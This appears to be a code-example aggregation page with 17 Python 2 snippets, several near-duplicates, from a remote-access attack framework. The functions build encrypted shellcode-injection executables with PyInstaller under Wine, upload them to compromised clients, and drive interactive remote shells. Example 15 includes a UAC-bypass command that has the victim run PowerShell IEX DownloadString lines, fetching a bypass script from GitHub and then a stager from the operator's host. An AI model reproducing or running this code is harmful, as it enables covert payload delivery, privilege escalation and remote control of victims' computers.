Ejemplo n.º 1
0
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))

    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
                          '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    if re.search('error', payloadstderr.lower()):
        print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal
        sys.stdout.write(payloadstderr)
        raise KeyboardInterrupt
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True)
    else:
        DoPayloadUpload(payloadname)
Ejemplo n.º 2
0
def checkUpload():
    from menu import clientMenuOptions
    use_client_upload = prompt_toolkit.prompt(
        '\n[?] Upload Using Client Connection? [y]/n: ',
        patch_stdout=True,
        completer=WordCompleter(['y', 'n']))
    print
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        clientList = []
        for i in clientMenuOptions.keys():
            if i == 'back' or i == 'r':
                pass
            else:
                clientList.append(i)
                print t.bold_yellow + i + t.normal + ': ' + t.bold_green + clientMenuOptions[
                    i]['payload'] + t.bold_yellow + ' | ' + t.bold_green + clientMenuOptions[
                        i]['availablemodules'].keys(
                        )[0] + t.bold_yellow + ' | ' + t.bold_green + clientMenuOptions[
                            i]['availablemodules'].keys()[1] + t.normal
        print
        while True:
            clientchoice = prompt_toolkit.prompt(
                'Client > ',
                patch_stdout=True,
                style=prompt_toolkit.styles.style_from_dict(
                    {prompt_toolkit.token.Token: '#FFCC66'}),
                completer=WordCompleter(clientList))
            try:
                return int(clientMenuOptions[clientchoice]['params'])
            except:
                continue
    return False
Ejemplo n.º 3
0
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))

    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
                          '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    if len(sys.argv) > 1:
        if sys.argv[1] == "-debug":
            sys.stdout.write(payloadstderr)
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    if len(clientMenuOptions.keys()) > 2:
        from stager import clientUpload
        clientUpload((payloaddir() + '/' + payloadname), powershellExec=ez2read_shellcode, isExe=True, json='{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}')
    else:
        DoPayloadUpload(payloadname)
Ejemplo n.º 4
0
def interactShell(clientconn,clientnumber):
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24

    while True:
        command = raw_input("PS > ")
        if command == "back":
            break
        elif command == "" or command == "\n":
            continue
        elif command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
            break
        else:
            clientconn.sendall(command)

        while True:
            data = clientconn.recv(1)
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                data = ''
                break
    return True
Ejemplo n.º 5
0
def interactShell(clientconn,clientnumber):
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24
    while True:
        while clientconn in select.select([clientconn], [], [], 0.2)[0]:
            computerName += clientconn.recv(2048)
            if len(computerName) > 1:
                print t.bold_yellow + computerName + t.normal

        command = raw_input("> ")
        if command == "back":
            break
        elif command == "":
            clientconn.sendall("\n")
        elif command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
                time.sleep(2)
            break
        else:
            clientconn.sendall(command)

        while True:
            data = clientconn.recv(1).rstrip('\r')
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return "clear"
Ejemplo n.º 6
0
def interactShell(clientconn, clientnumber):
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-" * 24 + "\nback - Background Shell\nexit - Close Connection\n" + "-" * 24
    while True:
        while clientconn in select.select([clientconn], [], [], 0.2)[0]:
            computerName += clientconn.recv(2048)
            if len(computerName) > 1:
                print t.bold_yellow + computerName + t.normal

        command = raw_input("> ")
        if command == "back":
            break
        elif command == "":
            clientconn.sendall("\n")
        elif command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
                time.sleep(2)
            break
        else:
            clientconn.sendall(command)

        while True:
            data = clientconn.recv(1).rstrip('\r')
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return "clear"
Ejemplo n.º 7
0
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))
    p = subprocess.Popen(['wine', '/root/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
                          '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    if re.search('error', payloadstderr.lower()):
        print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal
        sys.stdout.write(payloadstderr)
        raise KeyboardInterrupt
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True)
    else:
        DoPayloadUpload(payloadname)
Ejemplo n.º 8
0
def checkClientUpload(payloadname, powershellExec, isExe):
    from menu import clientMenuOptions
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(), payloadname, powershellExec, isExe)
        return True
    else:
        print powershellExec
        return False
Ejemplo n.º 9
0
def GeneratePayload(ez2read_shellcode, payloadname, shellcode):
    randoFileName = ''.join(random.sample(string.ascii_lowercase, 8))
    with open('%s/%s.py' % (payloaddir(), randoFileName), 'w+') as Filesave:
        Filesave.write(
            do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    p = subprocess.Popen([
        'wine',
        os.path.expanduser('~') + '/.win32/drive_c/Python27/python.exe',
        '/opt/pyinstaller/pyinstaller.py',
        '%s/%s.py' % (payloaddir(), randoFileName), '--noconsole', '--onefile'
    ],
                         env=dict(
                             os.environ, **{
                                 'WINEARCH': 'win32',
                                 'WINEPREFIX':
                                 os.path.expanduser('~') + '/.win32'
                             }),
                         bufsize=1024,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    if len(sys.argv) > 1:
        if sys.argv[1] == "-debug":
            sys.stdout.write(payloadstderr)
    try:
        os.rename('dist/%s.exe' % randoFileName,
                  '%s/%s.exe' % (payloaddir(), randoFileName))
    except OSError:
        print t.bold_red + "[!] Error while creating payload..." + t.normal
        print payloadstderr
        return False

    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (
        payloaddir(), randoFileName) + t.normal
    CleanUpPayloadMess(randoFileName)
    from menu import clientMenuOptions
    if len(clientMenuOptions.keys()) > 2:
        from stager import clientUpload
        clientUpload(
            (payloaddir() + '/' + randoFileName),
            powershellExec=ez2read_shellcode,
            isExe=True,
            json=
            '{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}'
        )
    else:
        DoPayloadUpload(randoFileName)
    return True
Ejemplo n.º 10
0
def pingClients(clientconn,clientnumber):
    from menu import clientMenuOptions
    try:
        while True:
            time.sleep(15)
            clientconn.recv(1)
    except:
        if str(clientnumber) in clientMenuOptions.keys():
            print t.bold_red + "Client %s Has Disconnected" % clientnumber + t.normal
            del clientMenuOptions[str(clientnumber)]
        sys.exit(1)
Ejemplo n.º 11
0
def pingClients(clientconn,clientnumber):
    from menu import clientMenuOptions
    try:
        while True:
            time.sleep(15)
            clientconn.recv(1)
    except:
        if str(clientnumber) in clientMenuOptions.keys():
            print t.bold_red + "Client %s Has Disconnected" % clientnumber + t.normal
            del clientMenuOptions[str(clientnumber)]
        sys.exit(1)
Ejemplo n.º 12
0
def checkUpload():
    from menu import clientMenuOptions
    use_client_upload = raw_input('[?] Upload Using Client Connection? [y]/n: ')
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        for i in clientMenuOptions.keys():
            if i == 'back' or i == 'r':
                pass
            else:
                print t.bold_yellow + i + t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload']  + t.normal + '\n'
        while True:
            clientchoice = raw_input('>> ')
            try:
                return int(clientMenuOptions[clientchoice]['params'])
            except:
                continue
    return False
Ejemplo n.º 13
0
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe):
    use_client_upload = raw_input(
        '\n[*] Upload Using Client Connection? [y]/n: ')
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        from menu import clientMenuOptions
        for i in clientMenuOptions.keys():
            if i == 'back' or i == 'r':
                pass
            else:
                print t.bold_yellow + i +t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload']  + t.normal + '\n'
        while True:
            clientchoice = raw_input('>> ')
            try:
                clientnumber = clientMenuOptions[clientchoice]['params']
                break
            except:
                continue
        clientUpload((payloaddir + '/' + payloadname),clientnumber,powershellExec,isExe)
        print "Allow 20 seconds for payload connection..."
Ejemplo n.º 14
0
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe):
    use_client_upload = raw_input(
        '\n[*] Upload Using Client Connection? [y]/n: ')
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        from menu import clientMenuOptions
        for i in clientMenuOptions.keys():
            if i == 'back' or i == 'r':
                pass
            else:
                print t.bold_yellow + i +t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload']  + t.normal + '\n'
        while True:
            clientchoice = raw_input('>> ')
            try:
                clientconn, clientnumber = clientMenuOptions[clientchoice]['params']
                break
            except:
                continue

        clientUpload((payloaddir + '/' + payloadname),clientconn,powershellExec,isExe)
Ejemplo n.º 15
0
def interactShell(clientconn, clientnumber):
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-" * 50 + "\nback - Background Shell\nexit - Close Connection\nuacbypass - UacBypass To Open New Admin Connection\n" + "-" * 50
    while True:
        while clientconn in select.select([clientconn], [], [], 0.1)[0]:
            computerName += clientconn.recv(2048)
            if len(computerName) > 1:
                print t.bold_yellow + computerName + t.normal

        command = raw_input(" ")
        if command.lower() == "back":
            break
        elif command.lower() == "uacbypass":
            clientconn.sendall(
                "IEX (New-Object Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-EventVwrBypass.ps1\");Invoke-EventVwrBypass -Command \"powershell.exe -c IEX (New-Object Net.Webclient).DownloadString('http://"
                + FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) +
                "/" + "p.ps1" + "')\"")
        elif command == "":
            clientconn.sendall("\n")
        elif command.lower() == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client %s Connection Killed" % clientnumber + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
                time.sleep(2)
            break
        else:
            clientconn.sendall(command)

        while True:
            data = clientconn.recv(1).rstrip('\r')
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return "clear"
Ejemplo n.º 16
0
def interactShell(clientconn,clientnumber):
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24
    while True:
        data = ''
        command = raw_input("PS >")
        if command == "back":
            break
        if command == "exit":
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
            break
        if command == "":
            continue
        clientconn.sendall(command)
        while True:
            data = clientconn.recv(1)
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return True
Ejemplo n.º 17
0
def checkClientUpload(payloadname, powershellExec, isExe):
    from menu import clientMenuOptions
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(),payloadname,powershellExec,isExe)
    else:
        print powershellExec